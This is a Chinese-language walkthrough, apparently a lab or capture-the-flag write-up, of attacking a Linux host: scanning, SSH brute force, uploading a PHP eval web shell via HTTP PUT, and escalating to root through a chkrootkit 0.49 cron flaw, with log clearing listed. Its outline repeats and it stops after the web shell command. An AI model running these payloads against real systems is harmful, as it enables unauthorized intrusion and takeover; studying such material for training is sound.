linux计划任务提权

目录

(1)信息收集

1)主机发现

arp-scan -l

2)端口扫描

nmap 192.168.1.3

发现开放 ssh 端口尝试暴力破解,成功爆出弱口令

远程登陆,拿到 root 权限,游戏结束 ssh root@192.168.1.3 

3)目录扫描

dirb http://192.168.1.3

(2)漏洞扫描

使用 namp 查看/test 目录支持的方法

nmap --script http-methods --script-args http-methods.url-path='/test'  192.168.1.3

(3)漏洞利用

方法一,向IP地址为192.168.1.4的服务器发送一个OPTIONS请求,获取关于服务器支持的HTTP方法和其他相关信息的响应

curl http://192.168.1.4/test/ -vv -X OPTIONS

curl -v -X PUT -d '' http://192.168.1.4/test/shell.php

方法二:抓包发到重发器,改包使用 PUT 方法写入一句话木马,重发

木马 b.php 写入成功

蚁剑连接

msf 生成后门程序

访问查看

4)网站指纹识别

whatweb http://192.168.1.3

(4)提权

1)三连查看(我是谁,我在哪儿,你是谁)

2)查看版本及内核信息

3)查看 crontab 中包含的文件(定时任务表)

ls -la /etc/cron*

4)查看 chkrootkit 版本,搜索是否存在漏洞

chkrootkit -V

searchsploit chkrootkit 0.49

5)查看提权步骤

find / -name "33899.txt"

cat /usr/share/exploitdb/exploits/linux/local/33899.txt

chkrootkit 会定期以 root 身份执行/tmp/update 文件

6)提权

1./tmp 目录下创建 update 文件并赋予权限

2.向 update 文件中写入将 www-date 添加到 sudo 组的命令

(7)日志清除


(1)信息收集

1)主机发现

arp-scan -l

2)端口扫描

nmap 192.168.1.3

发现开放 ssh 端口尝试暴力破解,成功爆出弱口令

远程登陆,拿到 root 权限,游戏结束 ssh root@192.168.1.3 

-- snip -- 假如不是弱口令游戏继续

3)目录扫描

dirb http://192.168.1.3

(2)漏洞扫描

使用 namp 查看/test 目录支持的方法

nmap --script http-methods --script-args http-methods.url-path='/test'  192.168.1.3

发现支持 PUT 方法,利用 PUT 文件上传

(3)漏洞利用

方法一,向IP地址为192.168.1.4的服务器发送一个OPTIONS请求,获取关于服务器支持的HTTP方法和其他相关信息的响应

curl http://192.168.1.4/test/ -vv -X OPTIONS

curl -v -X PUT -d '<?php eval($_GET["cmd"]);?>' http://192.168.1.4/test/shell.php

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值